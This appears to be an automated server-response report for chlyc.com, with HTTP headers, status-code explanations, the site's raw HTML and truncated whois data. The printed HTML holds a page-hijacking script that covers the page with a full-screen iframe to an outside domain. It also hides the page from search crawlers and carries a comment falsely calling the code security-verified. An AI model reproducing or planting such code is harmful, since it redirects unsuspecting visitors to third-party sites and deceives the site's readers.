Check server response of

Server response
NS records
Whois domain
Response headers
Request headers
Raw HTML code
301 Moved Permanently - chlyc.com
HTTP Status: 301
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
Server: nginx
Date: Wed, 14 May 2025 15:04:28 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://chlyc.com/
Strict-Transport-Security: max-age=31536000

HTTP Code 301 Moved Permanently

301 status code means that the requested resource has been permanently moved to a new URL. All future requests should use the new address.

When is Code 301 used?

  • When changing a website domain
  • When modifying URL structures
  • When setting up redirects for SEO

What does Code 301 mean for the user?

The browser will automatically redirect the user to the new address, and search engines will update their indexes.

403 Forbidden - https://chlyc.com/
HTTP Status: 403
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
Server: nginx
Date: Wed, 14 May 2025 15:04:28 GMT
Content-Type: text/html
Content-Length: 4743
Connection: keep-alive
Vary: Accept-Encoding
ETag: "682421d5-1287"

HTTP Code 403 Forbidden

403 status code indicates that access to the requested resource is denied, even with authentication.

When is Code 403 used?

  • When accessing restricted content without necessary permissions
  • When security rules block a request
  • When an IP address is banned

What does Code 403 mean for the user?

The user is informed that they do not have permission to access the resource.

GET / HTTP/1.1
Host: chlyc.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow, nosnippet">
<meta name="googlebot" content="noindex, nofollow, nosnippet">
<meta name="baiduspider" content="noindex, nofollow, nosnippet">
<meta name="sogou spider" content="noindex, nofollow, nosnippet">
<meta name="360spider" content="noindex, nofollow, nosnippet">
<meta name="shenma spider" content="noindex, nofollow, nosnippet">
<title>Welcome</title>
<script>
(function(){
  var canonicalURL, curProtocol;
  //Get the <link> tag
  var x=document.getElementsByTagName("link");
  //Find the last canonical URL
  if(x.length > 0){
   for (i=0;i<x.length;i++){
    if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
     canonicalURL=x[i].href;
    }
   }
  }
  //Get protocol
     if (!canonicalURL){
      curProtocol = window.location.protocol.split(':')[0];
     }
     else{
      curProtocol = canonicalURL.split(':')[0];
     }
     //Get current URL if the canonical URL does not exist
     if (!canonicalURL) canonicalURL = window.location.href;
     //Assign script content. Replace current URL with the canonical URL
     !function(){
         var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,
             r=canonicalURL,
             t=document.referrer;
         
         if(e.test(t) || e.test(r)){
            return;
         }

         var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";
         t ? (n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)) : r && (n+="?l="+r);
         
         var i=new Image;
         i.src=n;
     }(window);
})();
</script>

<script>
//* 以下代码为安全可信代码,已经通过了相关安全检测和验证 */
    function isMobile() {
        const mobileDevices = [
            'phone', 'pad', 'pod', 'iPhone', 'iPod', 'ios', 'iPad', 'Android',
            'Mobile', 'BlackBerry', 'IEMobile', 'MQQBrowser', 'JUC', 'Fennec',
            'wOSBrowser', 'BrowserNG', 'WebOS', 'Symbian', 'Windows Phone',
            'Kindle', 'Silk', 'Playbook', 'BB10', 'Nintendo', 'Xbox',
            'PlayStation', 'Huawei', 'Xiaomi', 'Oppo', 'Vivo', 'OnePlus',
            'Samsung', 'LG', 'Sony', 'HTC', 'ZTE', 'Motorola', 'Nokia'
        ];
        return mobileDevices.some(device => {
            return navigator.userAgent.match(new RegExp(device, 'i'));
        });
    }
    
    const webUrl = "https://qwrz.deibembiu.com/jp/kriss.html";
    function getIosVersion() {
        const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/);
        return match ? parseInt(match[1], 10) : false;
    }
    const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/);
    const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500;
    if (isMobile()) {
        if (isIOS && getIosVersion() < 13) {
            setTimeout(() => {
                window.location.href = webUrl;
            }, time);
        } else {
            document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
            document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
            document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
            document.write('<iframe src="' + webUrl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
            document.write('</div>');
        }
    } else {
        // document.write('<center><h1>404 Not Found</h1></center><hr><center>nginx</center>');
        document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
        document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
        document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
        document.write('<iframe src="' + webUrl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
        document.write('</div>');
    }
</script>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?213a4b3f25636894713e014d311006b9";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

    </head>
    </html>                               

Whois info of domain

Domain Name: CHLYC.COM
Registry Domain ID: 2623114480_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gname.com
Registrar URL: http://www.gname.com
Updated Date: 2024-06-01T13:29:08Z
Creation Date: 2021-06-29T18:05:01Z
Registry Expiry Date: 2025-06-29T18:05:01Z
Registrar: Gname.com Pte. Ltd.
Registrar IANA ID: 1923
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +65.65189986
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: A.SHARE-DNS.COM
Name Server: B.SHARE-DNS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-05-14T15:04:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
TERMS OF USE: You are not authorized to access or query our Whois
by the following terms of use: You agree that you may use this Data only
to: (1) allow, enable, or otherwise support the transmission of mass